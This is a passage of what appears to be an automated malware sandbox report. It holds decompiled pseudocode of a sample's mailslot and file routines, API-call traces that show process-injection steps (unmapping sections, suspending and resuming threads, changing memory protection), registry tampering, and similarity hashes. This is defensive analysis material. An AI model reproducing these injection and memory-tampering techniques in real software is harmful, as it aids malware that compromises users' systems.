				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

















0x004010fb
0x004010fb
0x00401104
0x00401107
0x00401118
0x00401121
0x00401124
0x00401139
0x00401126
0x0040112e
0x00401131
0x00401131
0x0040113c
0x00401145
0x004011ea
0x004011ef
0x004011ef
0x00401158
0x0040115f
0x004011da
0x004011e1
0x004011e4
0x00000000
0x004011e4
0x00401161
0x00401164
0x00401165
0x00401168
0x0040116e
0x00401170
0x00401173
0x00401175
0x00401175
0x0040118a
0x00401192
0x004011a8
0x004011b1
0x004011b4
0x00000000
0x00000000
0x00401194
0x00401194
0x00401197
0x0040119a
0x0040119c
0x004011a2
0x004011a3
0x004011a3
0x0040119c
0x004011b8
0x004011be
0x004011c8
0x004011d1
0x00000000

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00000000,004017B9), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 001D7CFA, Relevance: 13.6, APIs: 9, Instructions: 114 Total matches: 65memorystring
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B314CA, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45 Total matches: 29librarythread
Similarity
  • Total matches: 29
  • API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary
  • String ID: USER32.DLL$pnls$pnls
  • API String ID: 1514306980-1300720345
  • Opcode ID: 50136b8a9ad019f77738c7d2695a80d9cfa58a10d54e3dd229c6b48dc4baf302
  • Instruction ID: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
  • Opcode Fuzzy Hash: 2ED0A7C10F5D4412085E48CC143A5A300CAEC2171527BAE2F3439681A14B52311D0EC9
  • Instruction Fuzzy Hash: 33d9b5e3af68464c4ee12d6cec6cbf656236a2a99d1b1536a0d5b0eb5269df1d
APIs
  • LoadLibraryA.KERNEL32(USER32.DLL), ref: 01B314D9
  • GetModuleHandleA.KERNEL32(USER32.DLL,01B38000,?,?,01B3180F,00000000,?,01B37494), ref: 01B314FF
  • FindWindowA.USER32(01B38640,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31515
  • GetWindowThreadProcessId.USER32(00000000,00000000,?,?,01B3180F,00000000,?,01B37494), ref: 01B31520
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B31093, Relevance: 10.6, APIs: 7, Instructions: 67 Total matches: 199memorythread
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 00401033, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64 Total matches: 190memorysleepfile
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}















0x00401033
0x0040103d
0x0040104c
0x0040104f
0x00401057
0x0040105a
0x004010d6
0x004010dc
0x004010df
0x0040105c
0x00401062
0x00401066
0x004010c4
0x004010c4
0x00401068
0x00401068
0x00401076
0x0040107e
0x004010a4
0x004010ad
0x004010b0
0x004010b2
0x00000000
0x004010b2
0x00401080
0x00401080
0x00401086
0x00401092
0x00401098
0x0040109c
0x00000000
0x0040109e
0x0040109e
0x00000000
0x0040109e
0x0040109c
0x00000000
0x004010b5
0x004010b7
0x004010bd
0x004010c2
0x004010cb
0x004010ce
0x004010ce
0x004010e6
0x004010e8
0x004010eb
0x004010ee
0x004010ee
0x004010f8

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Function 01B31673, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 194file
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B322D2, Relevance: 9.1, APIs: 6, Instructions: 105 Total matches: 307threadsynchronizationinjection
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001D77D8, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 97memory
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D8325, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 223libraryloader
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 334b4ad23c3ebcab69ace51bbaeeff1e78eacdd0a0d3c55371ac3bd1638c0514
  • Instruction ID: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
  • Opcode Fuzzy Hash: 4CD05EF84B9C968B402B7450581D36CA586B9D12C5ACC3663F326A685EAB11B3D0477A
  • Instruction Fuzzy Hash: 2fed91824860867219421b56d998874166137be7872b13253ad3f3dc9ed3227f
APIs
  • GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
  • GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
  • IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
  • CloseHandle.KERNEL32(00000000), ref: 001D8391
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B3421D, Relevance: 6.1, APIs: 4, Instructions: 99 Total matches: 294registrysynchronization
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 7bf492882853c3015655118e3a7311c329205b35a24c50d6a171498e9cb856b8
  • Instruction ID: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
  • Opcode Fuzzy Hash: 88F0C94503ACC397C42F94822FA2B63E242EF219C8C8CE795BBB47E1F91D6036124627
  • Instruction Fuzzy Hash: c4f6a71227964e3593b2b7d6490afeb5c5d07facd6dc22aca2af185f2e6999e2
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,01B37494), ref: 01B34244
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • RegEnumKeyExA.KERNEL32(?,?,?,01B37494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B3428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 01B342F8
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
    • Part of subcall function 01B32E04: StrChrA.SHLWAPI(01B37494,0000005F), ref: 01B32E47
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B37494), ref: 01B32E5F
    • Part of subcall function 01B32E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 01B32E95
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32EBB
    • Part of subcall function 01B32E04: lstrlenW.KERNEL32 ref: 01B32ECC
    • Part of subcall function 01B32E04: RtlAllocateHeap.NTDLL(00000000,01B374CA), ref: 01B32EE1
    • Part of subcall function 01B32E04: RegQueryValueExW.KERNEL32(00000000,01B381C0,00000000,?,00000000,01B37494), ref: 01B32F06
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F2A
    • Part of subcall function 01B32E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 01B32F3C
    • Part of subcall function 01B32E04: lstrcmpiW.KERNEL32(00000000), ref: 01B32F53
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,01B380FA), ref: 01B32F95
    • Part of subcall function 01B32E04: lstrcpy.KERNEL32(?,?), ref: 01B32FEE
    • Part of subcall function 01B32E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 01B33002
    • Part of subcall function 01B32E04: RegQueryValueExA.ADVAPI32(?,01B38256,00000000,?,?,01B37494), ref: 01B33025
    • Part of subcall function 01B32E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,01B342EB,?,?,01B34303,0AEBFFFF), ref: 01B33088
    • Part of subcall function 01B32E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 01B330A3
    • Part of subcall function 01B32E04: RegDeleteValueW.ADVAPI32(?,01B37560), ref: 01B330B1
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330BA
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(?), ref: 01B330C3
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,01B37494,?), ref: 01B330D8
    • Part of subcall function 01B32E04: HeapFree.KERNEL32(00000000,00000000), ref: 01B330FB
    • Part of subcall function 01B32E04: RegCloseKey.ADVAPI32(00000000), ref: 01B3310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,01B37494), ref: 01B34320
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 01B33368, Relevance: 6.1, APIs: 4, Instructions: 71 Total matches: 385file
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: f05951512fc70493bcc218ada1478013eab1d332df878026975bea813deea018
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 32E026401A9D83C9C64754854852F22B264E764646DACF7626718BF232AF263236DF2A
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 01B33C8B: GetModuleFileNameW.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB1
    • Part of subcall function 01B33C8B: GetModuleFileNameA.KERNEL32(01B37494,00000000,00000104,00000208,01B3618C,0000000C,?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000), ref: 01B33CB9
    • Part of subcall function 01B33C8B: GetLastError.KERNEL32(?,?,01B32A88,?,00000001,01B3618C,0000000C,00000000,?,?,?,01B317BE), ref: 01B33CF7
    • Part of subcall function 01B348FB: lstrcmp.KERNEL32(?,01B37494), ref: 01B349A8
    • Part of subcall function 01B348FB: lstrlen.KERNEL32(?,00000000,00000000,01B31852), ref: 01B349B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01B333BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,01B31BAF,01B38451), ref: 01B333CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 01B333E5
  • CloseHandle.KERNEL32(?), ref: 01B33400
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C3C55, Relevance: 6.1, APIs: 4, Instructions: 67 Total matches: 64memoryregistry
Similarity
  • Total matches: 64
  • API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap
  • String ID:
  • API String ID: 1519508758-0
  • Opcode ID: 2c20f16d7cb35b0837f37e1f163c74e89bf46e78e287d7b3e7984998dc48fbe4
  • Instruction ID: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
  • Opcode Fuzzy Hash: BFE07DE10F45C256111F7D4A647FA76C310CC440D130C7313BD74596BD0E43301B8709
  • Instruction Fuzzy Hash: 12fb51b55a7001464f3794808c81bf3cfeac7e12aa544af5f58c252b32687a95
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
  • HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3BF0, Relevance: 4.5, APIs: 3, Instructions: 39 Total matches: 129registrystring
Similarity
  • Total matches: 129
  • API ID: RegCreateKeyRegOpenKeylstrlen
  • String ID:
  • API String ID: 3913359509-0
  • Opcode ID: 4a10325c95453f6cc476ef8e5a47647315785bf9e091164d0adb2aeafd4fec03
  • Instruction ID: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
  • Opcode Fuzzy Hash: 9CD0A934820C8ACBC02B88001C6AA2A80A0AB010C2C8C627278C23912B2F9072892EA5
  • Instruction Fuzzy Hash: 51caf505ad6b25b9284138eb4f6b6eda7fb90fd966c398a8e598c706edcf3f74
APIs
  • RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
  • RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
  • lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C13D6, Relevance: 4.5, APIs: 3, Instructions: 18 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: CloseHandleHeapDestroySetEvent
